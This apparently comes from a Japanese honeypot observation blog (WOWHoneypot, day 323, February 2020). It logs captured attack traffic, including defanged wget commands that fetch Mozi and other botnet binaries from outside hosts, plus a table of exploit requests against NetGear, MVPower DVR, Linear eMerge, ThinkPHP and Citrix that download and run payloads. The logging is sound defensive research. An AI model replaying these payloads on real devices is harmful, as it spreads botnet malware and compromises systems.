WOWHoneypot観察(323日目)
2020/02/03(月)
トータルは121件でした。
ハンティングログは以下です。
220.92.153[.]250 wget hxxp[:]//switchnets.net/hoho.arm7 |
www.virustotal.com
www.virustotal.com
89.248.174[.]146 wget${IFS}hxxp[:]//82.223.101[.]182/.t/80/arm7 |
www.virustotal.com
www.virustotal.com
182.127.55[.]152 wget+hxxp[:]//182.127.55[.]152:53566/Mozi.m |
www.virustotal.com
www.virustotal.com
27.15.82[.]232 wget+hxxp[:]//27.15.82[.]232:39880/Mozi.m |
www.virustotal.com
www.virustotal.com
118.68.0[.]157 wget+hxxp[:]//scan.casualaffinity.net/jaws |
www.virustotal.com
www.virustotal.com
件数 | 概要 | リクエスト |
---|---|---|
40 | 調査 | GET /script |
30 | アクセス | GET / |
12 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
9 | 調査 | GET /is_test |
6 | Linear eMerge E3の脆弱性を狙った通信 | GET /card_scan_decoder.php?No=30&door=%60wget%20hxxp[:]//switchnets.net/hoho.arm7;%20chmod%20777%20hoho.arm7;%20./hoho.arm7%20linear%60 |
2 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
2 | Tomcatの調査 | GET /manager/text/list |
2 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
1 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
1 | Citrix製品の脆弱性を狙っら通信 | GET /vpn/js/%2e./.%2e/%76pns/cfg/smb.conf |
1 | NetGear製品の脆弱性を狙った通信 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp[:]//27.15.82.232:39880/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
1 | NetGear製品の脆弱性を狙った通信 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp[:]//182.127.55.152:53566/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
1 | GET /logs | |
1 | GET /index.php | |
1 | 環境設定の調査 | GET /.env |
1 | 不正中継の試み | CONNECT ip.ws.126.net:443 |
1 | GPONルーターの脆弱性を狙った通信 | POST /GponForm/diag_Form?images/ |
1 | Solrの調査 | GET /solr/admin/info/system?wt=json |
1 | MVPower DVRの脆弱性を狙った通信 | GET /shell?cd+/tmp;rm+-rf+*;wget+hxxp[:]//scan.casualaffinity.net/jaws;sh+/tmp/jaws |
1 | ThinkPHPの脆弱性を狙った通信 | GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP |
1 | ThinkCMFの脆弱性を狙った通信 | GET /?a=fetch&content= |
1 | リモートデバッグの調査 | GET /?XDEBUG_SESSION_START=phpstorm |